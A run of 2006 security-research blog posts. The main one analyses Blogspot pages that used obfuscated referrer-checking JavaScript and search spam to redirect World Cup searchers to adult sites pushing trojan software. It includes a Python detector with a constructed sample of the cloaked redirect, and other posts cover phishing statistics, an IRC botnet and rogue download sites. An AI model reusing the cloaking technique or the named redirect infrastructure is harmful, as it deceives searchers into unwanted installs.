This investigation over distribution and deception was kicked off by one of the world's biggest sporting events- the World Cup. We all have our favorite teams, and at FaceTime we want people to be able to follow their favorite teams and sports safely! The goal of our research was to investigate a popular sporting event and probe the Internet for attacks, social engineering, or any other malicious or deceptive activity centered around this event.

Flow Chart Sample of Events

To better understand the event flow, see the flow chart image linked below.

http://blog.spywareguide.com/upload/2006/07/flowchart-thumb.JPG

Deceptive Mass Spamming Distribution

Basic search engine analysis shows the "party unknown" appears to be using automated techniques to spam guest books and other web pages in order to create links to the domain. Because of the auto-rotation system the domain's homepage changes frequently and apparently randomly. For example, it often defaults to Google's own portal for India.

Search System Pollution

As we will show, the techniques used to taint MSN search rankings are based on an understanding of the MSN search algorithm. However, the primary deceptive tactics are carried out through obfuscated JavaScript injected into Google's Blogspot page headers. This is significant because this particular problem has been publicly noted before by researcher Ben Edelman.


WARNING TO USERS: DO NOT go searching for these sites unless you are a trained security researcher. There is a dynamic component to this operation which could lead to a hostile environment or unwanted content. In short, what you see is not what you may get.

Research: How Did This Happen?

While searching for the keyword "World Cup 2006" in the MSN search engine, our researcher clicked the first natural result, the result below the sponsored ads. This result appeared to be an innocent-looking Blogspot URL, as the screenshot will demonstrate.


Note on Search Engine Results:

Search engines use their own systems to determine the relevancy of a page for a keyword entered in the Search Box. Based on the search engine's algorithms the pages will be ranked and appear in the results. These results are often called SERPS or Search Engine Result Pages.

In crude theory the first result should be the most relevant to the keyword, the second result a somewhat less relevant page, etc. Numerous factors affect relevancy beyond the scope of this write-up. It is reasonable to expect people to believe they will find the most relevant pages on the first pages of the results. For this reason, in this study, we have placed emphasis on studying the first results returned in the SERPS.

http://blog.spywareguide.com/upload/2006/06/Blogspot_Hijack/FIFAWorldCupSearchResult-thumb.JPG

How Did this Page Get to the Top?

In simple terms, by using "spam techniques." With the browser's JavaScript turned off, the user would see a page like this:

Click To View Page with JavaScript Off


Redirection and Misdirection Over Time

Upon some of the first checks of these URLs our researcher noted redirects to the following Russian web-site. By.ru is a common hosting company, and the "tkgroup" appears to be a student class blog.

http://blog.spywareguide.com/upload/2006/06/Blogspot_Hijack/FIFARussianWebSite-thumb.JPG

At first glance it might seem this could be a student prank merely playing search engine tricks. However, after several days the same result redirected our researcher to a different website, which is now "Adult DVD Download Network" IcooNet. The context and tone have now changed considerably: the tone is now commercial in intent but also pornographic. Users would have no way of knowing the site they were trying to reach would serve pornographic content if they relied on the title, text description and link displayed in the SERP.

http://blog.spywareguide.com/upload/2006/06/Blogspot_Hijack/FIFAIcoonet-thumb.JPG

In this example our search term was FIFA-related, so it would seem unreasonable to be offered an adult downloader. This is deceptive, and many users may find it offensive, especially since it is reasonable to expect young football fans would be searching for similar terms and would be guided by the domain name, title and description.

From a legal context this is significant: US CODE: Title 18,2252B. Misleading domain names on the Internet, from law.cornell.edu.

In a final example, the redirection goes to a website which features pornographic galleries offering a program that is cited as a variant of Zlob.Media-Codec. It may go under different names. A EULA is presented if the user wants to access the deceptively advertised pornography. We have not placed a screenshot here because the images are simply too offensive for our blog standards, but we have retained screen capture documentation and video of the site.

The different variants of these programs have to be downloaded in order to play any of the movies on the web-site.

Note this particular search query was conducted from one of our labs in India, so other users and countries will likely get different results. In addition search results change frequently. For purposes of documentation, we have included packet logs from query to destination as well as install of software.

Query Sample 1: Term FIFA+World+Cup+2006 .txt file

Query Sample 2: Term FIFA+World+Cup+2006 .txt file


We Just Wanted the World Cup

In the sample query illustrated by the packet logs above our researcher, searching for "FIFA World Cup 2006", finds a tainted Blogspot site and clicks through. The log documents the various redirects, which end with the researcher arriving on a pornographic website where he was offered, and accepted, programs with well documented problematic behavior.

The initial MSN results showed 3 out of 10 results from Blogspot which display the obfuscated JavaScript and redirection system. Users rely on search engines to deliver high quality and relevant results. Since the domain names contain football (soccer to U.S. readers) related terms, titles and descriptions, it is reasonable that the user will feel confident clicking through.

In a system such as this any number of attacks could be launched, and depending on the degree of sophistication of the attack or skill in social engineering, the results could be quite harmful. The screenshot below shows the tainted Blogspot URLs at MSN in the top ten results.

http://blog.spywareguide.com/upload/2006/07/3of10BlogSpotURLsinFirstpageoftheMSNResult-thumb.JPG


Past History of Problems

It should be noted that while we were unable to document any exploit behavior on the software page of the pornographic site, the software itself has a well documented history of problematic behavior from numerous third-party sources. It is usually classified as a "trojan". Reference: Sunbelt on Zlob.Media-Codec, and Super AdBlocker on xpassman-v3, for example.

EULA Red Flags

In this particular case EULAs were presented with the software product(s) needed to access the content deceptively advertised by the unknown party. EULA analysis shows additional security software will be added, updates can be made, and the home page will be changed, among other items.

See one EULA Analysis Sample

By accepting it the user grants the software rights to install additional components on the machine. These components or updates may not have cleared appropriate security hygiene processes. In addition no warranty on performance of the software is given.

Also notable: our automated readability analysis of the EULAs displayed shows that reading skills beyond the twelfth-grade level are needed to understand the document, according to several readability batteries.

Flesch Grade: Beyond Twelfth Grade reading level
Automated Readability Index: Beyond Twelfth Grade reading level
Coleman-Liau Index: Beyond Twelfth Grade reading level
Gunning-Fog Index: Beyond Twelfth Grade reading level

Technical Background: How Did Blogspot Do This?

The attack is quite subtle. Put simply it uses obfuscated or "garbled" JavaScript.

Inspecting the source code of the blog entry, we noted JavaScript calling a function decode(). There was no simple redirection code to be found in the page source at first glance; all we saw was what looked like random numbers stored as a string. The function name itself, decode, was the hint to decode the whole function. Let us take a look at the original source code:

http://blog.spywareguide.com/upload/2006/06/Blogspot_Hijack/FIFAJavaScript-thumb.JPG


Now let us examine the screenshot of the "decoded" code:



http://blog.spywareguide.com/upload/2006/06/Blogspot_Hijack/FIFAJavaScriptDecoded-thumb.JPG


Explanation of Code:
The code says that if the blog is referred by any of the following major search engines:

Google
MSN
Yahoo
AOL
Ask
Altavista

Then it will open the URL http://www.toptravel10.com/search.php?aid=<*****>&q=World+Cup, which calls the redirection system into action. Therefore, the writer of this code is actively looking to intercept search traffic and move it somewhere else, and is doing so with obvious intent.

However, if the Blogspot address is only pasted or typed into the address bar of the IE browser, it redirects to the MSN search result for the keyword "World Cup 2006". As we know from the search result screen capture above, 3 out of the first 10 MSN natural search results could most likely be the same kind of tainted Blogspot entries. Clicking any of those entries will again redirect to the same system. This puts the user into a dangerous cycle. We qualify "most likely" because the top ten entries can and do change dynamically, beyond the control of users.
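As an added analyst check (not code from this post or from the tainted pages), the Python below models the decode()-plus-number-string construct described above as decimal character codes, which is an assumption since the post does not give the encoding, decodes it, and flags the pattern the post describes: a referrer test, the six search engine names, and a redirect. The sample page and its placeholder redirect hosts are constructed for the example.

```python
"""Analyst check for the cloaked Blogspot redirect described above.

Added example; not code from the post or from the pages it analysed.
ASSUMPTION: the post only says the page carried a decode() function and
a string of numbers, so the hidden payload is modelled here as decimal
character codes. The constructed sample redirects to placeholder hosts,
not to the live mediator URL named in the post.
"""
import re
from dataclasses import dataclass, field
from typing import List

# Referrers the decoded script on the tainted pages tested for (from the post).
SEARCH_ENGINES = ("google", "msn", "yahoo", "aol", "ask", "altavista")

# decode(...) called on a long run of digits and separators.
ENCODED_CALL = re.compile(r"decode\(\s*[\"']([\d\s,]{40,})[\"']\s*\)", re.IGNORECASE)

# Assignments or calls that navigate the browser somewhere else.
REDIRECT_SINK = re.compile(
    r"(?:window\.|document\.|top\.)?location(?:\.href|\.replace)?\s*[=(]", re.IGNORECASE)


@dataclass
class Finding:
    encoded_payloads: int = 0
    decoded: str = ""
    checks_referrer: bool = False
    engines_named: List[str] = field(default_factory=list)
    redirects: bool = False

    @property
    def is_cloaked_redirect(self) -> bool:
        # The pattern from the post: hidden code that looks at where the
        # visitor came from, names search engines, and sends the visitor on.
        return self.checks_referrer and bool(self.engines_named) and self.redirects


def decode_charcodes(blob: str) -> str:
    """'104 116 116 112' (space or comma separated) -> 'http'."""
    return "".join(chr(int(n)) for n in re.split(r"[\s,]+", blob.strip()) if n)


def encode_charcodes(text: str) -> str:
    """Inverse of decode_charcodes, used only to build the sample page."""
    return " ".join(str(ord(c)) for c in text)


def analyse_page(html: str) -> Finding:
    """Decode numeric payloads in the page and look for the cloaking pattern."""
    f = Finding()
    for m in ENCODED_CALL.finditer(html):
        f.encoded_payloads += 1
        f.decoded += decode_charcodes(m.group(1)) + "\n"
    decoded = f.decoded.lower()
    # The referrer test may sit in plain or hidden script; engine names and
    # the redirect are judged on the decoded text, which is what actually runs.
    f.checks_referrer = "document.referrer" in (html + decoded).lower()
    f.engines_named = [e for e in SEARCH_ENGINES if re.search(r"\b%s\b" % e, decoded)]
    f.redirects = REDIRECT_SINK.search(decoded) is not None
    return f


# Constructed plaintext of the hidden script: branch on the referrer, send
# search visitors to the mediator (placeholder host), everyone else back to
# a search results page, as the post describes. Not the live code.
HIDDEN_SCRIPT = (
    "var r=document.referrer.toLowerCase();"
    "if(/google|msn|yahoo|aol|ask|altavista/.test(r)){"
    "window.location='http://mediator.example.invalid/search.php?q=World+Cup';}"
    "else{window.location='http://search.example.invalid/?q=World+Cup+2006';}"
)

# Constructed page: a decode() helper plus the number string, as on the tainted blogs.
SAMPLE_PAGE = (
    "<html><head><title>FIFA World Cup 2006</title>\n"
    "<script>function decode(s){var o='',a=s.split(' ');"
    "for(var i=0;i<a.length;i++)o+=String.fromCharCode(a[i]);return o;}\n"
    "eval(decode('" + encode_charcodes(HIDDEN_SCRIPT) + "'));</script>\n"
    "</head><body>World Cup 2006 fixtures</body></html>"
)

BENIGN_PAGE = "<html><head><script>document.write('World Cup 2006');</script></head></html>"

if __name__ == "__main__":
    for name, page in (("sample", SAMPLE_PAGE), ("benign", BENIGN_PAGE)):
        r = analyse_page(page)
        print(name, "cloaked redirect:", r.is_cloaked_redirect, "engines:", r.engines_named)
```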

Controlling the Deceit

In this case there is no need to change the source code of the page, because the operator of the toptravel10 domain has set up a complex server-side, auto-rotation system of unknown make-up. The tainted Blogspot URLs use the URL http://www.toptravel10.com/search.php?aid=56340&q=World+Cup as a mediator: the Blogspot URLs open this page when called, and at this point the toptravel10 domain's system decides where the user is redirected. The mediator remains constant and links to different URLs over a given period of time. In this entry the researcher was referred first to a Russian web-site, second to ICOONet (Adult DVD Downloader), and now the mediator links to VideoGalleries, which in turn offers adult-oriented software.

It is also notable the ownership information for the toptravel10.com domain is cloaked through a proxy registration service.


Why Use Blogspot?

Blogspot has been the target for similar attacks in the past. Researcher Ben Edelman's concern about Blogspot will help us understand why this case is important. From his article:

"...Numerous blogs hosted at Google's Blogspot service contain JavaScript that tries to trick users into installing unneeded software..."

In this instance the obfuscated JavaScript not only impacts the quality of search engine results it also acts as a more complex line of redirects to distance the designer from the scene.


Why MSN Search?

As researchers, we might ask: "Why would someone target the MSN search system?"

The logical reasons would probably be that most Windows-based operating systems redirect to MSN search by default, and/or that the orchestrator had some mastery at gaming the Microsoft ranking algorithm.

Examples of tainted URLs are:

http://worldcup2006z.blogspot.com
http://footballwordcup2006.blogspot.com
http://fifaworldcup2006-.blogspot.com
http://-fifaworldcup2006.blogspot.com

(Note: after contacting Google last week, these are now offline!)

Are There More?

Yes. One such instance was found for the keyword "AIRLINE TICKETS".

These blog URLs may also be redirected to the same pornographic galleries, again depending on the system of rotation.

The blog URLs found for the keyword "AIRLINE TICKETS":

http://airlineticketsz.blogspot.com
http://cheapairlineticketsz.blogspot.com

Conclusion and Final Notes:

A solution was already offered by Ben Edelman:

"...What should Google do? Google already disallows JavaScript within Blogspot.com posts. Apparently Google considers embedded JavaScript too risky -- too likely to trick, deceive, or otherwise take advantage of users. But Google oddly allows JavaScript to be added to Blogspot headers and navigation bars. This decision should be reversed..."

In terms of football (soccer) this is the equivalent of a "Yellow Card".

We must add the following caution and warning on the tactical approach.

In this particular case the unknown party used some technological sophistication coupled with knowledge of world events, search engine algorithms and planning. However, the party used poor targeting.

Let us explore a "what if" scenario...

What if the same system, using football (soccer) keywords, were used to trick a user into opening a page that asked them to view 'World Cup Bloopers' or 'World Cup Highlights', or lured users with a fake video of a 'disputed call' or 'insider interview' cobbled together from pirated video footage? The user, now contextually targeted, would probably click, and any number of hostile scenarios could be played out. The attack would be limited only by the creativity and motivation of the operator.

To use our football analogy again- this is a "Red Card".

LATE ADDITION: We have contacted Google about our concerns pointing out the problem around the World Cup spam and they reacted rapidly. Initial research seems to show they scoured Blogspot and removed the tainted URLs so World Cup fans wouldn't fall into this trap during the championship weekend. However, the root of the problem still remains. What to do about the JavaScript? Ultimately that is a problem Google will have to solve.

The problem has been pointed out before- history should be the teacher.


Blog Summary Write-Up: Wayne Porter, Sr. Dir. Greynets Research
Technical Research: Peter Jayaraj, FSL Threat Researcher

Phishing is a form of criminal activity using social engineering or trickster techniques to fraudulently acquire sensitive information, such as passwords and credit card details, by masquerading as a trustworthy person or business in an apparently official electronic communication, such as an email or an instant message. The term phishing arises from the use of increasingly sophisticated lures to "fish" for users' financial information and passwords. Some phishing has become so complicated that it no longer needs to steal information from the web, IM or e-mail, but instead lures users onto phone connections and captures them using phone techniques. (You call a number, they ask you to enter your account number and PIN and voilà, they capture the "tones" made by your telephone keypad input and your account is wide open to the scammer.)

We talked a while ago about the global phishing termination operation launched by CastleCops and Sunbelt Software. The volunteer PIRT Squad is comprised of folks who report phish, investigate phish, and actively work on phish takedown and termination (original concept by Robin Laudanski). PIRT is funded by CastleCops.

Our own Microsoft Security MVP, Chris Boyd, has been participating in the PIRT Squad over at CastleCops and some of the first results are in. CastleCops' operators, Robin and Paul Laudanski, have compiled the list of the top phished brands in May. The all-volunteer group of phishing terminators is having a real impact on phishing. Our own research team follows up on many of these phish sites and notes that many are offline quickly! That is good news...but the battle is far from over. (Other "things" may lurk at the end of these phish attempts, but that is for another entry.)

So without further ado, the top brands phished in May.
Pay special attention to how "pure Internet play" brands like PayPal and eBay are the most common targets.

May 2006 confirmed phish (brand plus total count for May):

PayPal - 520
eBay - 309
Bank of America - 37
Barclays - 36
Wells Fargo - 36
Chase - 33
WAMU - 28
HSBC - 20
MasterCard - 18
e-gold - 17
Nationwide - 17
Citi - 16
BancorpSouth - 14
Postbank.de - 12
Halifax - 11
NetBank - 11
Laredo Nat'l Bank - 10
Nat'l Australia Bank - 10
Western Union - 10
National Credit Union - 9

With this early report in mind we have to take into account that Google is now throwing their hat into the e-commerce ring with a service called "Google Checkout". The business implications of this move are very, very complicated and beyond the scope of this entry- although they are important to security researchers too. However, in terms of pure security research the proverbial writing is on the wall...Google and e-commerce will only attract scammers like bears to honey. How successful they will be will depend much on how Google implements the process, their anti-fraud features, and how educated people are on phishing in general.

I admit, especially in my talks and speeches with youngsters, I am quite dismayed at the lack of awareness on Internet safety. That is one area I, and our team, have been pondering.

One of the best forms of defense is very simply "street smarts". For example, we teach children not to go into dark alleys late at night; in fact most parents wouldn't let their children out in a city at night at all! Yet our digital highways can be dangerous too, and the two mediums are often treated differently. I plan to write more on this in the future.

For now, let us get back to Google Checkout.

Some of the features of Google Checkout include:

1) Google will store your complete shopping history. This is convenient of course, but remember that if you lose access to that account, that history goes with it. This is no different than losing access to any e-mail account via a hack.

2) Google won't share your full credit card number, even with the merchants you buy from. This makes sense, since Google is doing the transaction on behalf of the merchant.

3) Google won't share your email address with merchants if you don't want them to. This is nice- you don't have to worry about getting lots of promotions via e-mail if you don't want.

4) Google will not spam you. Google pledges they will not spam you- great. They never have and I believe that is not in their plans.

5) You can store as many credit cards in Google Checkout as you want! That is where it starts to get a little bit risky.

Now, again, I am not being anti-Google, I am only being a realist. You have a pure play Internet brand, new to offering payment transaction processing to the public at large, prepared to do business en masse. If we look at recent history, like the PIRT report, it only stands to reason that Google, other privacy concerns aside, will experience their fair share of phishing attempts.

For now- use "street smarts". Be wary and be careful.

NOTE: If you are technically adept at handling phishing attempts and want to help by joining the PIRT Squad you can join the team here, if you simply want to report a phishing attempt you can do so by clicking here.

Hot on the heels of the Botnet caught bundling Zango a few days ago, here's an interesting one I found while lurking in the outermost regions of IRC yesterday...

First off, check out this IRC server. It's fair to say it has a large userbase (at least 16,000 channels!):

http://blog.spywareguide.com/upload/2006/05/btchans1-thumb.jpg

...and with that many users, it's a prime target for Botnet pimping. So with that in mind, let's pick up that Pimp Goblet and get things moving!

Assume...just assume...that IRC is, in fact, full of spammers, viruses, Trojans, haxx0rs and Malware. Then...assume that lots of infected users fire spam messages at you to try and infect you with more garbage, making you a part of that particular Botnet.

Then...assume I was fired a Spam message myself, and decided to have a play with the files....

...and sure enough, that's what happened! At this point, I'd usually show you a screenshot of the infection taking hold of the PC, but the thing about "straight" Botnet installers (ie: minus Adware) is that they aren't much use if they put a big, flashing "Botnet Alert!!!!112" message in the middle of your screen. But what I can show you, is a walkthrough of what this particular nasty actually does.

Suffice to say, this install takes place in two parts, and is run via two different Botnets - the Spam installers come from one source, and the Scanner installers come from another. This is merely a safety precaution - if you lose all your Spam-bots due to being shut down, you still have your "Scanner Bots" (which hunt for exploitable machines), and vice versa. No point rebuilding an Empire from scratch, right?

Now let's examine the state of the Server itself - the view is not pretty. The Admins of the IRC server clearly know about the Bot problems - because I've never seen so many Bot kickers, drone watchers and channels full of infected users being dumped out of channels in my life:

http://blog.spywareguide.com/upload/2006/05/btbanned1-thumb.jpg

As you can see, my IP has been banned from that channel due to the fact it was used when I tested this infection previously - hence, I'm kicked out by a Channel Operator. In addition, I'm not even allowed to enter the other channel (blanked out) - such is the hatred here for Bots. Well, it's understandable.

At this point, I enter one of the (semi-random) channels I know this Bot tries to slip you into from my clean PC...and I wait for my infected test-box to show up. See, this thing works like this: user gets infected, infected PC enters and exits a number of IRC channels and has a particular phrase set as the "away" message. At this point, the away message is Spammed to lots of different users, or is viewable when they look up the infected user's contact info. While I'm waiting for my infected machine to show up, I'm bombarded with what looks like different Bot-spam from anything up to 12 different users within the first 10 seconds of entering the channel. Eventually, my infected PC turns up, and I know for sure that this Botnet is up and running correctly. Of course, all the infected PCs are called things like HOTGURL4YOU, to encourage foolish men to start messaging the Bot like crazy. Which they do....and they then see the away message:

http://blog.spywareguide.com/upload/2006/05/btwhois1-thumb.jpg

Ooh, yes please!! Want to make a guess how many people will fall for this simple bit of social engineering? Sure enough, anyone foolish enough to click the link and execute the - er - executable...will find themselves upgraded to a higher realm of Botnets!

The "higher realm" here means a Botnet that scans networks for specific vulnerabilities to spread itself still further. I know what you're thinking at this point - the story wouldn't be complete without a screenshot of the master infection channel, right? Well, have no fear, because the Ghostman has already predicted your need to see a payoff shot and here it is:

http://blog.spywareguide.com/upload/2006/05/btmaster1-thumb.jpg

Nice!

As a sideline, I should add that I don't just find Botnets and take a bunch of pretty pictures, before leaving them to go look for new ones - appropriate steps are taken to get them shut down where possible. I've since found out this one is also being investigated by another group, and I'll be forwarding the information I've collected here to see if it can be put to good use.

In the meantime, if you insist on navigating the dangerous currents of IRC, think twice before checking out SUPAHOTTIEGURL's latest batch of home-grown pictures, or you may find yourself appearing in my next collection of screenshots!

As I blogged earlier in the entry, in a clean VM SpyOnThis detected 13 different threats, all of which are false positives (FPs). Most of them were cookies.

Let us dig into each key flagged as spyware by SpyOnThis and see why they are false positives.

Object: ClearSearch
Class: REGKEY
Type: SPYWARE
FoundIn: HKEY_CURRENT_USER:SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\TRUSTEDPUBLISHER\CTLS
RiskLevel: 4

ClearSearch object found!!!
Object: ClearSearch
Class: REGKEY
Type: SPYWARE
FoundIn: HKEY_CURRENT_USER:SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\TRUSTEDPUBLISHER\CRLS
RiskLevel: 4

Claria object found!!!
Object: Claria
Class: REGKEY
Type: SPYWARE
FoundIn: HKEY_USERS:.default\software\microsoft\systemcertificates\trustedpublisher\crls
RiskLevel: 3

Look at the original keys in the Registry that were flagged as spyware:

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\TrustedPublisher\CRLs]

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\TrustedPublisher\CTLs]

Windows Registry Editor Version 5.00
[HKEY_USERS\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPublisher\CRLs]

Note: there were no values associated with these keys when they were detected as spyware.

In order to make a full analysis we need to know some basic things here:


CA - Certification Authority
An entity entrusted to issue certificates that assert that the recipient individual, computer, or organization requesting the certificate fulfills the conditions of an established policy.

CRL - Certificate Revocation List
A document maintained and published by a certification authority (CA) that lists certificates issued by the CA that are no longer valid.

CTL - Certificate Trust List
A predefined list of items that have been signed by a trusted entity. A CTL can be anything, such as a list of hashes of certificates, or a list of file names. All the items in the list are authenticated (approved) by the signing entity.

The keys I mentioned are default keys the Windows operating system uses to handle trusted publisher certificates, for example when IE makes a secure (SSL) connection. SSL creates a secure connection between a client and a server, over which any amount of data can be sent securely.

A CA releases CRLs periodically to make sure users and enterprises know about certificates that are no longer valid. This registry key is modified when we import CRLs from a CA.

None of the above keys is related to either Claria or ClearSearch.
Thus classifying these keys as spyware is erroneous.

Let us check other keys also in detail.

While Googling for a HijackThis download, I spotted a link from Google's AdSense program. Check out the following screenshot:



(Note: the red X is part of the SiteAdvisor program, which can help users spot sites that use deceptive practices, and is only displayed if you are using the program.)

In the above screenshot clicking the link "HijackThis Free download" opens the site http://hijack-this.net/. Naturally curiosity compelled me to dig deeper into this site, and I also wanted to know what Merijn, the original creator of HJT, had to say about it. It appears it struck his radar a long time ago and he was not pleased that the name of his product was being used to push other commercial products.

He states on http://www.merijn.org/:

"April 22, 2005:
Just a short note on the domain HIJACK-THIS.NET: this is not mine! It has been registered by an affiliate of XoftSpy (who are also on the Rogue Antispyware List on SpywareWarrior.com) and they are luring people into downloading their software believing it is HijackThis. Also, they have registered a few AdWords at Google leading to the same result. We'll see where this goes. In the meantime, if you want to download any of my programs, the official domain is and always will be www.merijn.org.

UPDATE: April 29, 2005:
I just received word from Paretologic (the owners of XoftSpy) that the affiliate responsible for the page has been terminated and the site will be taken down. That's one down, one to go. :)"

Let's dig into this mystery...

This one has been circulating among the security pros, and analysis can now be found here and here.

For those not in the know, Yapbrowser is a browser "search tool" - unfortunately, none of the paid-for links work (they return a blank page), and anything entered into the browser redirects to...illegal pornography. What makes this even more interesting is that you need to install Zango (from 180 Solutions) to run the application.

The response, or perhaps lack of one, from 180 should be interesting, to say the least...I wonder how it will differ from the interview Wayne Porter did with them a year ago.

They said...

First, 180solutions cares a tremendous amount about what users think about our software, from how it is distributed to how it works on a user's machine. As our company has grown, our company has and will continue to invest heavily in user-focused initiatives. Going forward, through the use of additional staff and innovative technology, we will dramatically increase control over how our partners operate. We understand and accept the responsibility to monitor and police our partners.

Historically, 180solutions has not installed software; we relied on a network of partners to distribute our applications. Over the last year, 180solutions has placed greater emphasis on managing distribution partners as well as moving to maintain more control over how our software is installed on users' machines. In response to public and our own concerns, we carefully monitor our channels for conduct we find inappropriate. 180solutions has a stringent distributor code of conduct in place and frequently audits distribution partners.

Reference:

Porter's Preface to 180 Solutions Response & Some Software Philosophy.

Official Response from 180solutions to Porter's Questions
